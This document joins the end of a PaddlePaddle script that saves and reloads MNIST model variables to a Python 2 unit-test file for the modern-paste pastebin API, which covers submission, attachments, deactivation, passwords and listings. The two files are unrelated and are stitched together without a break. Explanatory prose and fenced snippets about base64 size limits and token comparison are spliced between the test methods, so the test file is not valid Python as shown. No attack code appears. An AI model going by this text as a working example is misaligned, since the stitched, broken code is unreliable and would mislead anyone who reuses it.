            step = 0
            for epoch_id in epochs:
                for step_id, data in enumerate(train_reader()):
                    metrics = exe.run(main_program,
                                      feed=feeder.feed(data),
                                      fetch_list=[avg_loss, acc])
                    if step % 100 == 0:
                        print("Pass %d, Epoch %d, Cost %f" % (step, epoch_id,
                                                              metrics[0]))
                    step += 1
                if save_dirname is not None:
                    vars = fluid.io.get_program_parameter(main_program)
                    fluid.io.save_vars(
                        exe, "./compatible_save_vars", main_program, vars=vars)
                    # load_param(test_program1)
                    # test for epoch
                    avg_loss_val, acc_val = train_test(
                        train_test_program=test_program,
                        train_test_reader=test_reader,
                        train_test_feed=feeder,
                        vars=vars)
                    avg_loss_val1, acc_val1 = load(
                        train_test_program=test_program1,
                        train_test_reader=test_reader,
                        train_test_feed=feeder,
                        vars=vars)
                    print("Test with Epoch %d, avg_cost: %s, acc: %s" %
                          (epoch_id, avg_loss_val, acc_val))
                    print("New Test with Epoch %d, avg_cost: %s, acc: %s" %
                          (epoch_id, avg_loss_val1, acc_val1))
                    assert avg_loss_val == avg_loss_val1
                    assert acc_val == acc_val1
                    lists.append((epoch_id, avg_loss_val, acc_val))
                    shutil.rmtree("./compatible_save_vars")
            # find the best pass
            best = sorted(lists, key=lambda item: float(item[1]))[0]
            print('Best pass is %s, testing Avgcost is %s' % (best[0], best[1]))
            print('The classification accuracy is %.2f%%' %
                  (float(best[2]) * 100))
def main1(use_cuda, nn_type):
    """
    main
    :param use_cuda:
    :param nn_type:
    :return:
    """
    model_filename = None
    params_filename = None
    save_dirname = "recognize_digits_" + nn_type + ".inference.model"
    # call train() with is_local argument to run distributed train
    train1(
        nn_type=nn_type,
        use_cuda=use_cuda,
        save_dirname=save_dirname,
        model_filename=model_filename,
        params_filename=params_filename)


def main2(use_cuda, nn_type):
    """
    main
    :param use_cuda:
    :param nn_type:
    :return:
    """
    model_filename = None
    params_filename = None
    save_dirname = "recognize_digits_" + nn_type + ".inference.model"
    # call train() with is_local argument to run distributed train
    train2(
        nn_type=nn_type,
        use_cuda=use_cuda,
        save_dirname=save_dirname,
        model_filename=model_filename,
        params_filename=params_filename)


def main3(use_cuda, nn_type):
    """
    main
    :param use_cuda:
    :param nn_type:
    :return:
    """
    model_filename = None
    params_filename = None
    save_dirname = "recognize_digits_" + nn_type + ".inference.model"
    # call train() with is_local argument to run distributed train
    train3(
        nn_type=nn_type,
        use_cuda=use_cuda,
        save_dirname=save_dirname,
        model_filename=model_filename,
        params_filename=params_filename)


def test_param():
    """
    start test save param
    :return:
    """
    main1(use_cuda=use_cuda, nn_type=predict)


def test_persist():
    """
    start test save persist
    :return:
    """
    main2(use_cuda=use_cuda, nn_type=predict)


def test_vars():
    """
    start test save vars
    :return:
    """
    main3(use_cuda=use_cuda, nn_type=predict)
# coding=utf-8
# tests/test_api/test_paste.py (cipherboy/modern-paste, MIT license)
import json
import random
import time
import mock
from sqlalchemy.exc import SQLAlchemyError
import config
import constants.api
import database.attachment
import database.paste
import database.user
import util.cryptography
import util.testing
from uri.authentication import *
from uri.main import *
from uri.paste import *
class TestPaste(util.testing.DatabaseTestCase):
    def test_submit_paste_invalid(self):
        # Invalid input
        resp = self.client.post(
            PasteSubmitURI.uri(),
            data=json.dumps({}),
            content_type='application/json',
        )
        self.assertEqual(resp.status_code, constants.api.INCOMPLETE_PARAMS_FAILURE_CODE)
        self.assertEqual(json.loads(resp.data), constants.api.INCOMPLETE_PARAMS_FAILURE)

    def test_submit_paste_login_required(self):
        # Config requires authentication to post paste
        config.REQUIRE_LOGIN_TO_PASTE = True
        resp = self.client.post(
            PasteSubmitURI.uri(),
            data=json.dumps({
                'contents': 'paste',
            }),
            content_type='application/json',
        )
        self.assertEqual(constants.api.UNAUTHENTICATED_PASTES_DISABLED_FAILURE_CODE, resp.status_code)
        self.assertEqual(constants.api.UNAUTHENTICATED_PASTES_DISABLED_FAILURE, json.loads(resp.data))
        user = util.testing.UserFactory.generate()
        resp = self.client.post(
            PasteSubmitURI.uri(),
            data=json.dumps({
                'contents': 'paste',
                'api_key': user.api_key,
            }),
            content_type='application/json',
        )
        self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)

    def test_submit_paste_no_auth(self):
        # Successful paste without authentication
        resp = self.client.post(
            PasteSubmitURI.uri(),
            data=json.dumps({
                'contents': 'contents',
            }),
            content_type='application/json',
        )
        self.assertEqual(resp.status_code, constants.api.SUCCESS_CODE)
        resp_data = json.loads(resp.data)
        self.assertIsNotNone(resp_data['post_time'])
        self.assertIsNotNone(resp_data['paste_id_repr'])
        self.assertTrue(resp_data['is_active'])
        self.assertEquals('contents', resp_data['contents'])
        self.assertIsNotNone(resp_data['deactivation_token'])
        resp = self.client.post(
            PasteSubmitURI.uri(),
            data=json.dumps({
                'contents': 'contents',
                'user_id': 1,
            }),
            content_type='application/json',
        )
        self.assertEqual(resp.status_code, constants.api.SUCCESS_CODE)
        resp_data = json.loads(resp.data)
        self.assertIsNotNone(resp_data['post_time'])
        self.assertIsNotNone(resp_data['paste_id_repr'])
        self.assertTrue(resp_data['is_active'])
        self.assertEquals('contents', resp_data['contents'])
        self.assertIsNone(database.paste.get_paste_by_id(1).user_id)
    def test_submit_paste_logged_in(self):
        # Paste should automatically be associated with user who is logged in
        user = util.testing.UserFactory.generate(username='username', password='password')
        resp = self.client.post(
            LoginUserURI.uri(),
            data=json.dumps({
                'username': 'username',
                'password': 'password',
            }),
            content_type='application/json',
        )
        self.assertEquals(resp.status_code, constants.api.SUCCESS_CODE)
        resp = self.client.post(
            PasteSubmitURI.uri(),
            data=json.dumps({
                'contents': 'contents',
            }),
            content_type='application/json',
        )
        self.assertEqual(resp.status_code, constants.api.SUCCESS_CODE)
        resp_data = json.loads(resp.data)
        self.assertIsNotNone(resp_data['post_time'])
        self.assertIsNotNone(resp_data['paste_id_repr'])
        self.assertTrue(resp_data['is_active'])
        self.assertEquals('contents', resp_data['contents'])
        self.assertIsNotNone(resp_data['deactivation_token'])
        self.assertEqual(user.user_id, database.paste.get_paste_by_id(util.cryptography.get_decid(resp_data['paste_id_repr'])).user_id)

    def test_submit_paste_api_post(self):
        # Ensure that the is_api_post flag is appropriately set
        resp = self.client.post(
            PasteSubmitURI.uri(),
            data=json.dumps({
                'contents': 'contents',
            }),
            content_type='application/json',
        )
        self.assertEqual(resp.status_code, constants.api.SUCCESS_CODE)
        paste_id = util.cryptography.get_decid(json.loads(resp.data)['paste_id_repr'], force=True)
        self.assertTrue(database.paste.get_paste_by_id(paste_id).is_api_post)

    def test_submit_paste_non_api_post(self):
        for referrer in [PastePostInterfaceURI.full_uri(), HomeURI.full_uri(), PastePostInterfaceURI.full_uri() + '/?extra=stuff']:
            resp = self.client.post(
                PasteSubmitURI.uri(),
                data=json.dumps({
                    'contents': 'contents',
                }),
                content_type='application/json',
                headers={
                    'referer': referrer,  # TIL "referer" is a deliberate misspelling of "referrer"
                },
            )
            self.assertEqual(resp.status_code, constants.api.SUCCESS_CODE)
            paste_id = util.cryptography.get_decid(json.loads(resp.data)['paste_id_repr'], force=True)
            self.assertFalse(database.paste.get_paste_by_id(paste_id).is_api_post)

    def test_submit_paste_non_ascii(self):
        resp = self.client.post(
            PasteSubmitURI.uri(),
            data=json.dumps({
                'contents': '어머',
            }),
            content_type='application/json',
        )
        self.assertEqual(resp.status_code, constants.api.SUCCESS_CODE)
        resp = self.client.post(
            PasteDetailsURI.uri(),
            data=json.dumps({
                'paste_id': json.loads(resp.data)['paste_id_repr'],
            }),
            content_type='application/json',
        )
        self.assertEqual(resp.status_code, constants.api.SUCCESS_CODE)
        self.assertEqual(json.loads(resp.data)['details']['contents'], unicode('어머', 'utf8'))
    def test_submit_paste_attachments_disabled(self):
        config.ENABLE_PASTE_ATTACHMENTS = False
        resp = self.client.post(
            PasteSubmitURI.uri(),
            data=json.dumps({
                'contents': 'contents',
                'attachments': [
                    {
                        'name': 'file name',
                        'size': 12345,
                        'mime_type': 'image/png',
                        'data': 'binary data',
                    }
                ]
            }),
            content_type='application/json',
        )
        self.assertEqual(constants.api.PASTE_ATTACHMENTS_DISABLED_FAILURE_CODE, resp.status_code)
        self.assertEqual(constants.api.PASTE_ATTACHMENTS_DISABLED_FAILURE, json.loads(resp.data))

    def test_submit_paste_with_attachments(self):
        with mock.patch.object(database.attachment, '_store_attachment_file') as mock_store_attachment_file:
            resp = self.client.post(
                PasteSubmitURI.uri(),
                data=json.dumps({
                    'contents': 'contents',
                    'attachments': [
                        {
                            'name': 'file name',
                            'size': 12345,
                            'mime_type': 'image/png',
                            'data': 'binary data',
                        },
                        {
                            'name': 'file name 2',
                            'size': 12345,
                            'mime_type': 'image/png',
                            'data': 'binary data 2',
                        }
                    ]
                }),
                content_type='application/json',
            )
            self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
            self.assertEqual(2, mock_store_attachment_file.call_count)
            resp_data = json.loads(resp.data)
            self.assertEqual('file_name', resp_data['attachments'][0]['name'])
            self.assertEqual(12345, resp_data['attachments'][0]['size'])
            self.assertEqual('image/png', resp_data['attachments'][0]['mime_type'])
            self.assertIsNotNone(database.attachment.get_attachment_by_name(
                util.cryptography.get_decid(resp_data['paste_id_repr']),
                'file_name')
            )
            self.assertEqual('file_name_2', resp_data['attachments'][1]['name'])
            self.assertEqual(12345, resp_data['attachments'][1]['size'])
            self.assertEqual('image/png', resp_data['attachments'][1]['mime_type'])
            self.assertIsNotNone(database.attachment.get_attachment_by_name(
                util.cryptography.get_decid(resp_data['paste_id_repr']),
                'file_name_2')
            )

    def test_submit_paste_invalid_attachments(self):
        with mock.patch.object(database.attachment, '_store_attachment_file') as mock_store_attachment_file:
            resp = self.client.post(
                PasteSubmitURI.uri(),
                data=json.dumps({
                    'contents': 'contents',
                    'attachments': [
                        {
                            'name': 'file name',
                        }
                    ]
                }),
                content_type='application/json',
            )
            self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
            self.assertEqual(1, mock_store_attachment_file.call_count)
    def test_submit_paste_too_large(self):
        config.MAX_ATTACHMENT_SIZE = 10.0 / (1000 * 1000)  # 10 B
        with mock.patch.object(database.attachment, '_store_attachment_file'):
            resp = self.client.post(
                PasteSubmitURI.uri(),
                data=json.dumps({
                    'contents': 'contents',
                    'attachments': [
                        {
                            'name': 'file name',
                            'size': 12345,
                            'mime_type': 'image/png',
                            'data': util.testing.random_alphanumeric_string(length=20),
                        },
                    ]
                }),
                content_type='application/json',
            )
            self.assertEqual(constants.api.PASTE_ATTACHMENT_TOO_LARGE_FAILURE_CODE, resp.status_code)
            self.assertEqual(constants.api.PASTE_ATTACHMENT_TOO_LARGE_FAILURE, json.loads(resp.data))
            resp = self.client.post(
                PasteSubmitURI.uri(),
                data=json.dumps({
                    'contents': 'contents',
                    'attachments': [
                        {
                            'name': 'file name',
                            'size': 12345,
                            'mime_type': 'image/png',
                            'data': util.testing.random_alphanumeric_string(length=5),
                        },
                    ]
                }),
                content_type='application/json',
            )
            self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)

    def test_submit_paste_base64_size_threshold(self):
        config.MAX_ATTACHMENT_SIZE = 3.0 / (1000 * 1000)  # 3 B
        with mock.patch.object(database.attachment, '_store_attachment_file'):
            resp = self.client.post(
                PasteSubmitURI.uri(),
                data=json.dumps({
                    'contents': 'contents',
                    'attachments': [
                        {
                            'name': 'file name',
                            'size': 12345,
                            'mime_type': 'image/png',
                            'data': util.testing.random_alphanumeric_string(length=5),
                        },
                    ]
                }),
                content_type='application/json',
            )
            self.assertEqual(constants.api.PASTE_ATTACHMENT_TOO_LARGE_FAILURE_CODE, resp.status_code)
            self.assertEqual(constants.api.PASTE_ATTACHMENT_TOO_LARGE_FAILURE, json.loads(resp.data))
            resp = self.client.post(
                PasteSubmitURI.uri(),
                data=json.dumps({
                    'contents': 'contents',
                    'attachments': [
                        {
                            'name': 'file name',
                            'size': 12345,
                            'mime_type': 'image/png',
                            'data': util.testing.random_alphanumeric_string(length=4),
                        },
                    ]
                }),
                content_type='application/json',
            )
            self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
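The base64 threshold test above pins down how the attachment limit appears to be measured: against the decoded size implied by the base64 payload, roughly 3/4 of the encoded length. The 3/4 factor is an inference from the 4-vs-5 character boundary in the test, not from server code shown here:

```python
def estimated_decoded_bytes(encoded_length):
    # Base64 packs 3 bytes into 4 characters, so the decoded payload
    # is about encoded_length * 3 / 4 bytes.
    return encoded_length * 3 / 4.0

# With a 3 B limit: 4 encoded chars fit, 5 do not -- matching the test above.
fits_4 = estimated_decoded_bytes(4) <= 3
fits_5 = estimated_decoded_bytes(5) <= 3
```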
    def test_submit_paste_server_error(self):
        with mock.patch.object(database.paste, 'create_new_paste', side_effect=SQLAlchemyError):
            resp = self.client.post(
                PasteSubmitURI.uri(),
                data=json.dumps({
                    'contents': 'contents',
                }),
                content_type='application/json',
            )
            self.assertEqual(resp.status_code, constants.api.UNDEFINED_FAILURE_CODE)
            self.assertEqual(json.loads(resp.data), constants.api.UNDEFINED_FAILURE)
    def test_deactivate_paste_invalid(self):
        resp = self.client.post(
            PasteDeactivateURI.uri(),
            data=json.dumps({}),
            content_type='application/json',
        )
        self.assertEqual(resp.status_code, constants.api.INCOMPLETE_PARAMS_FAILURE_CODE)
        self.assertEqual(json.loads(resp.data), constants.api.INCOMPLETE_PARAMS_FAILURE)
        resp = self.client.post(
            PasteDeactivateURI.uri(),
            data=json.dumps({
                'paste_id': -1,
            }),
            content_type='application/json',
        )
        self.assertEqual(resp.status_code, constants.api.NONEXISTENT_PASTE_FAILURE_CODE)
        self.assertEqual(json.loads(resp.data), constants.api.NONEXISTENT_PASTE_FAILURE)

    def test_deactivate_paste_auth(self):
        # Deactivate paste by being authenticated and owning the paste
        user = util.testing.UserFactory.generate(username='username', password='password')
        paste = util.testing.PasteFactory.generate(user_id=user.user_id)
        resp = self.client.post(
            PasteDeactivateURI.uri(),
            data=json.dumps({
                'paste_id': util.cryptography.get_id_repr(paste.paste_id),
            }),
            content_type='application/json',
        )
        self.assertEqual(resp.status_code, constants.api.AUTH_FAILURE_CODE)
        resp = self.client.post(
            LoginUserURI.uri(),
            data=json.dumps({
                'username': 'username',
                'password': 'password',
            }),
            content_type='application/json',
        )
        self.assertEquals(resp.status_code, constants.api.SUCCESS_CODE)
        resp = self.client.post(
            PasteDeactivateURI.uri(),
            data=json.dumps({
                'paste_id': util.cryptography.get_id_repr(paste.paste_id),
            }),
            content_type='application/json',
        )
        self.assertEqual(resp.status_code, constants.api.SUCCESS_CODE)
        self.assertFalse(database.paste.get_paste_by_id(paste.paste_id).is_active)

    def test_deactivate_paste_api_key(self):
        # Deactivate paste by authentication via an API key
        user = util.testing.UserFactory.generate()
        paste = util.testing.PasteFactory.generate(user_id=user.user_id)
        resp = self.client.post(
            PasteDeactivateURI.uri(),
            data=json.dumps({
                'paste_id': util.cryptography.get_id_repr(paste.paste_id),
                'api_key': user.api_key,
            }),
            content_type='application/json',
        )
        self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
        self.assertFalse(database.paste.get_paste_by_id(paste.paste_id).is_active)
    def test_deactivate_paste_token(self):
        # Deactivate paste using deactivation token
        paste = util.testing.PasteFactory.generate()
        resp = self.client.post(
            PasteDeactivateURI.uri(),
            data=json.dumps({
                'paste_id': util.cryptography.get_id_repr(paste.paste_id),
                'deactivation_token': 'invalid',
            }),
            content_type='application/json',
        )
        self.assertEqual(resp.status_code, constants.api.AUTH_FAILURE_CODE)
        resp = self.client.post(
            PasteDeactivateURI.uri(),
            data=json.dumps({
                'paste_id': util.cryptography.get_id_repr(paste.paste_id),
                'deactivation_token': paste.deactivation_token,
            }),
            content_type='application/json',
        )
        self.assertEqual(resp.status_code, constants.api.SUCCESS_CODE)
        self.assertFalse(database.paste.get_paste_by_id(paste.paste_id).is_active)
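The deactivation flow above accepts any caller who presents the paste's `deactivation_token`. A minimal sketch of such a server-side check — hypothetical, not modern-paste's actual implementation — would compare the submitted token against the stored one in constant time:

```python
import hmac

def may_deactivate(stored_token, submitted_token):
    # Constant-time comparison avoids leaking token prefixes via timing.
    return hmac.compare_digest(stored_token, submitted_token)

allowed = may_deactivate('abc123', 'abc123')   # matching token accepted
denied = may_deactivate('abc123', 'invalid')   # mismatch rejected
```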
    def test_deactivate_paste_already_deactivated(self):
        # Deactivating an already-deactivated paste should report it as nonexistent
        paste = util.testing.PasteFactory.generate()
        database.paste.deactivate_paste(paste.paste_id)
        resp = self.client.post(
            PasteDeactivateURI.uri(),
            data=json.dumps({
                'paste_id': util.cryptography.get_id_repr(paste.paste_id),
                'deactivation_token': paste.deactivation_token,
            }),
            content_type='application/json',
        )
        self.assertEqual(constants.api.NONEXISTENT_PASTE_FAILURE_CODE, resp.status_code)
        self.assertEqual(constants.api.NONEXISTENT_PASTE_FAILURE, json.loads(resp.data))

    def test_deactivate_paste_server_error(self):
        with mock.patch.object(database.paste, 'deactivate_paste', side_effect=SQLAlchemyError):
            paste = util.testing.PasteFactory.generate()
            resp = self.client.post(
                PasteDeactivateURI.uri(),
                data=json.dumps({
                    'paste_id': util.cryptography.get_id_repr(paste.paste_id),
                    'deactivation_token': paste.deactivation_token,
                }),
                content_type='application/json',
            )
            self.assertEqual(resp.status_code, constants.api.UNDEFINED_FAILURE_CODE)
            self.assertEqual(json.loads(resp.data), constants.api.UNDEFINED_FAILURE)
    def test_set_paste_password(self):
        user = util.testing.UserFactory.generate(username='username', password='password')
        self.api_login_user('username', 'password')
        paste = util.testing.PasteFactory.generate(user_id=user.user_id)
        old_password_hash = paste.password_hash
        resp = self.client.post(
            PasteSetPasswordURI.uri(),
            data=json.dumps({
                'paste_id': util.cryptography.get_id_repr(paste.paste_id),
                'password': 'password',
            }),
            content_type='application/json',
        )
        self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
        self.assertNotEqual(database.paste.get_paste_by_id(paste.paste_id).password_hash, old_password_hash)

    def test_set_paste_password_unauth(self):
        # Modifying your own paste without authorization
        user = util.testing.UserFactory.generate(username='username', password='password')
        paste = util.testing.PasteFactory.generate(user_id=user.user_id)
        resp = self.client.post(
            PasteSetPasswordURI.uri(),
            data=json.dumps({
                'paste_id': util.cryptography.get_id_repr(paste.paste_id),
                'password': 'password',
            }),
            content_type='application/json',
        )
        self.assertEqual(constants.api.AUTH_FAILURE_CODE, resp.status_code)
        self.assertEqual('auth_failure', json.loads(resp.data)[constants.api.FAILURE])

    def test_set_paste_password_invalid_auth(self):
        # Modifying someone else's paste
        user = util.testing.UserFactory.generate(username='username', password='password')
        self.api_login_user('username', 'password')
        paste = util.testing.PasteFactory.generate(user_id=user.user_id + 1)
        resp = self.client.post(
            PasteSetPasswordURI.uri(),
            data=json.dumps({
                'paste_id': util.cryptography.get_id_repr(paste.paste_id),
                'password': 'password',
            }),
            content_type='application/json',
        )
        self.assertEqual(constants.api.AUTH_FAILURE_CODE, resp.status_code)
        self.assertEqual('auth_failure', json.loads(resp.data)[constants.api.FAILURE])

    def test_set_paste_password_nonexistent(self):
        util.testing.UserFactory.generate(username='username', password='password')
        self.api_login_user('username', 'password')
        resp = self.client.post(
            PasteSetPasswordURI.uri(),
            data=json.dumps({
                'paste_id': -1,
                'password': 'password',
            }),
            content_type='application/json',
        )
        self.assertEqual(constants.api.NONEXISTENT_PASTE_FAILURE_CODE, resp.status_code)
        self.assertEqual(constants.api.NONEXISTENT_PASTE_FAILURE, json.loads(resp.data))
    def test_add_paste_password(self):
        user = util.testing.UserFactory.generate(username='username', password='password')
        self.api_login_user('username', 'password')
        paste = util.testing.PasteFactory.generate(user_id=user.user_id, password=None)
        self.assertIsNone(paste.password_hash)
        resp = self.client.post(
            PasteSetPasswordURI.uri(),
            data=json.dumps({
                'paste_id': util.cryptography.get_id_repr(paste.paste_id),
                'password': 'password',
            }),
            content_type='application/json',
        )
        self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
        self.assertIsNotNone(database.paste.get_paste_by_id(paste.paste_id).password_hash)

    def test_remove_paste_password(self):
        user = util.testing.UserFactory.generate(username='username', password='password')
        self.api_login_user('username', 'password')
        paste = util.testing.PasteFactory.generate(user_id=user.user_id, password='password')
        self.assertIsNotNone(paste.password_hash)
        resp = self.client.post(
            PasteSetPasswordURI.uri(),
            data=json.dumps({
                'paste_id': util.cryptography.get_id_repr(paste.paste_id),
                'password': None,
            }),
            content_type='application/json',
        )
        self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
        self.assertIsNone(database.paste.get_paste_by_id(paste.paste_id).password_hash)

    def test_set_paste_password_server_error(self):
        with mock.patch.object(database.paste, 'set_paste_password', side_effect=SQLAlchemyError):
            user = util.testing.UserFactory.generate(username='username', password='password')
            self.api_login_user('username', 'password')
            paste = util.testing.PasteFactory.generate(user_id=user.user_id)
            resp = self.client.post(
                PasteSetPasswordURI.uri(),
                data=json.dumps({
                    'paste_id': util.cryptography.get_id_repr(paste.paste_id),
                    'password': 'password',
                }),
                content_type='application/json',
            )
            self.assertEqual(constants.api.UNDEFINED_FAILURE_CODE, resp.status_code)
            self.assertEqual(constants.api.UNDEFINED_FAILURE, json.loads(resp.data))

    def test_paste_details_invalid(self):
        resp = self.client.post(
            PasteDetailsURI.uri(),
            data=json.dumps({}),
            content_type='application/json',
        )

        self.assertEqual(resp.status_code, constants.api.INCOMPLETE_PARAMS_FAILURE_CODE)
        self.assertEqual(json.loads(resp.data), constants.api.INCOMPLETE_PARAMS_FAILURE)

        resp = self.client.post(
            PasteDetailsURI.uri(),
            data=json.dumps({
                'paste_id': -1,
            }),
            content_type='application/json',
        )

        self.assertEqual(resp.status_code, constants.api.NONEXISTENT_PASTE_FAILURE_CODE)
        self.assertEqual(json.loads(resp.data), constants.api.NONEXISTENT_PASTE_FAILURE)

    def test_paste_details_no_password(self):
        user = util.testing.UserFactory.generate(username='username')
        paste = util.testing.PasteFactory.generate(password=None, user_id=user.user_id)

        resp = self.client.post(
            PasteDetailsURI.uri(),
            data=json.dumps({
                'paste_id': util.cryptography.get_id_repr(paste.paste_id),
            }),
            content_type='application/json',
        )

        self.assertEqual(resp.status_code, constants.api.SUCCESS_CODE)

        paste_details = database.paste.get_paste_by_id(paste.paste_id).as_dict()
        paste_details['poster_username'] = 'username'
        paste_details['attachments'] = []

        self.assertEqual(paste_details, json.loads(resp.data)['details'])

    def test_paste_details_password(self):
        user = util.testing.UserFactory.generate(username='username')
        paste = util.testing.PasteFactory.generate(password='None', user_id=user.user_id)

        resp = self.client.post(
            PasteDetailsURI.uri(),
            data=json.dumps({
                'paste_id': util.cryptography.get_id_repr(paste.paste_id),
            }),
            content_type='application/json',
        )

        self.assertEqual(resp.status_code, constants.api.AUTH_FAILURE_CODE)

        paste = util.testing.PasteFactory.generate(password='password', user_id=user.user_id)

        resp = self.client.post(
            PasteDetailsURI.uri(),
            data=json.dumps({
                'paste_id': util.cryptography.get_id_repr(paste.paste_id),
            }),
            content_type='application/json',
        )

        self.assertEqual(resp.status_code, constants.api.AUTH_FAILURE_CODE)

        paste = util.testing.PasteFactory.generate(password='password', user_id=user.user_id)

        resp = self.client.post(
            PasteDetailsURI.uri(),
            data=json.dumps({
                'paste_id': util.cryptography.get_id_repr(paste.paste_id),
                'password': 'invalid',
            }),
            content_type='application/json',
        )

        self.assertEqual(resp.status_code, constants.api.AUTH_FAILURE_CODE)

        paste = util.testing.PasteFactory.generate(password='password', user_id=user.user_id)

        resp = self.client.post(
            PasteDetailsURI.uri(),
            data=json.dumps({
                'paste_id': util.cryptography.get_id_repr(paste.paste_id),
                'password': 'password',
            }),
            content_type='application/json',
        )

        self.assertEqual(resp.status_code, constants.api.SUCCESS_CODE)

        paste_details = database.paste.get_paste_by_id(paste.paste_id).as_dict()
        paste_details['poster_username'] = 'username'
        paste_details['attachments'] = []

        self.assertEqual(paste_details, json.loads(resp.data)['details'])

    def test_paste_details_anonymous(self):
        paste = util.testing.PasteFactory.generate(password=None, user_id=None)

        resp = self.client.post(
            PasteDetailsURI.uri(),
            data=json.dumps({
                'paste_id': util.cryptography.get_id_repr(paste.paste_id),
            }),
            content_type='application/json',
        )

        self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
        self.assertEqual('Anonymous', json.loads(resp.data)['details']['poster_username'])

        user = util.testing.UserFactory.generate(username='username')
        paste = util.testing.PasteFactory.generate(password=None, user_id=user.user_id)
        database.user.deactivate_user(user.user_id)

        resp = self.client.post(
            PasteDetailsURI.uri(),
            data=json.dumps({
                'paste_id': util.cryptography.get_id_repr(paste.paste_id),
            }),
            content_type='application/json',
        )

        self.assertEqual(constants.api.NONEXISTENT_PASTE_FAILURE_CODE, resp.status_code)
        self.assertEqual(constants.api.NONEXISTENT_PASTE_FAILURE, json.loads(resp.data))

    def test_paste_details_nonexistent(self):
        resp = self.client.post(
            PasteDetailsURI.uri(),
            data=json.dumps({
                'paste_id': util.cryptography.get_id_repr(1),
            }),
            content_type='application/json',
        )

        self.assertEqual(constants.api.NONEXISTENT_PASTE_FAILURE_CODE, resp.status_code)
        self.assertEqual(constants.api.NONEXISTENT_PASTE_FAILURE, json.loads(resp.data))

    def test_paste_details_inactive(self):
        paste = util.testing.PasteFactory.generate(password=None, user_id=None)
        database.paste.deactivate_paste(paste.paste_id)

        resp = self.client.post(
            PasteDetailsURI.uri(),
            data=json.dumps({
                'paste_id': util.cryptography.get_id_repr(paste.paste_id),
            }),
            content_type='application/json',
        )

        self.assertEqual(constants.api.NONEXISTENT_PASTE_FAILURE_CODE, resp.status_code)
        self.assertEqual(constants.api.NONEXISTENT_PASTE_FAILURE, json.loads(resp.data))

    def test_paste_details_expired(self):
        paste = util.testing.PasteFactory.generate(password=None, user_id=None, expiry_time=int(time.time()) - 1000)

        resp = self.client.post(
            PasteDetailsURI.uri(),
            data=json.dumps({
                'paste_id': util.cryptography.get_id_repr(paste.paste_id),
            }),
            content_type='application/json',
        )

        self.assertEqual(constants.api.NONEXISTENT_PASTE_FAILURE_CODE, resp.status_code)
        self.assertEqual(constants.api.NONEXISTENT_PASTE_FAILURE, json.loads(resp.data))

    def test_paste_details_with_attachments(self):
        paste = util.testing.PasteFactory.generate(password=None, user_id=None)
        attachments = [
            util.testing.AttachmentFactory.generate(paste_id=paste.paste_id).as_dict()
            for _ in range(5)
        ]

        resp = self.client.post(
            PasteDetailsURI.uri(),
            data=json.dumps({
                'paste_id': util.cryptography.get_id_repr(paste.paste_id),
            }),
            content_type='application/json',
        )

        self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
        self.assertEqual(5, len(json.loads(resp.data)['details']['attachments']))
        for attachment in attachments:
            self.assertIn(attachment, json.loads(resp.data)['details']['attachments'])

    def test_paste_details_server_error(self):
        with mock.patch.object(database.paste, 'get_paste_by_id', side_effect=SQLAlchemyError):
            paste = util.testing.PasteFactory.generate(password=None)

            resp = self.client.post(
                PasteDetailsURI.uri(),
                data=json.dumps({
                    'paste_id': util.cryptography.get_id_repr(paste.paste_id),
                }),
                content_type='application/json',
            )

            self.assertEqual(resp.status_code, constants.api.UNDEFINED_FAILURE_CODE)
            self.assertEqual(json.loads(resp.data), constants.api.UNDEFINED_FAILURE)

    def test_pastes_for_user_unauthorized(self):
        resp = self.client.post(
            PastesForUserURI.uri(),
            data=json.dumps({}),
            content_type='application/json',
        )

        self.assertEqual(constants.api.AUTH_FAILURE_CODE, resp.status_code)
        self.assertEqual(constants.api.AUTH_FAILURE, json.loads(resp.data))

    def test_pastes_for_user_empty(self):
        util.testing.UserFactory.generate(username='username', password='password')
        self.api_login_user('username', 'password')

        resp = self.client.post(
            PastesForUserURI.uri(),
            data=json.dumps({}),
            content_type='application/json',
        )

        self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
        self.assertEqual([], json.loads(resp.data)['pastes'])

    def test_pastes_for_user_no_inactive(self):
        user = util.testing.UserFactory.generate(username='username', password='password')
        self.api_login_user('username', 'password')
        pastes = [util.testing.PasteFactory.generate(user_id=user.user_id).as_dict() for i in range(10)]
        [database.paste.deactivate_paste(util.cryptography.get_decid(paste['paste_id_repr'], force=True)) for paste in pastes]

        resp = self.client.post(
            PastesForUserURI.uri(),
            data=json.dumps({}),
            content_type='application/json',
        )

        self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
        self.assertEqual(0, len(json.loads(resp.data)['pastes']))

    def test_pastes_for_user_valid(self):
        user = util.testing.UserFactory.generate(username='username', password='password')
        self.api_login_user('username', 'password')
        pastes = [util.testing.PasteFactory.generate(user_id=user.user_id).as_dict() for i in range(10)]

        resp = self.client.post(
            PastesForUserURI.uri(),
            data=json.dumps({}),
            content_type='application/json',
        )

        self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
        self.assertEqual(len(pastes), len(json.loads(resp.data)['pastes']))
        for paste in json.loads(resp.data)['pastes']:
            self.assertIn(paste, pastes)

    def test_pastes_for_user_server_error(self):
        user = util.testing.UserFactory.generate(username='username', password='password')
        self.api_login_user('username', 'password')

        for i in range(3):
            util.testing.PasteFactory.generate(user_id=user.user_id)

        with mock.patch.object(database.paste, 'get_all_pastes_for_user', side_effect=SQLAlchemyError):
            resp = self.client.post(
                PastesForUserURI.uri(),
                data=json.dumps({}),
                content_type='application/json',
            )

            self.assertEqual(constants.api.UNDEFINED_FAILURE_CODE, resp.status_code)
            self.assertEqual(constants.api.UNDEFINED_FAILURE, json.loads(resp.data))

    def test_recent_pastes_invalid(self):
        resp = self.client.post(
            RecentPastesURI.uri(),
            data=json.dumps({}),
            content_type='application/json',
        )

        self.assertEqual(constants.api.INCOMPLETE_PARAMS_FAILURE_CODE, resp.status_code)
        self.assertEqual(constants.api.INCOMPLETE_PARAMS_FAILURE, json.loads(resp.data))

        resp = self.client.post(
            RecentPastesURI.uri(),
            data=json.dumps({
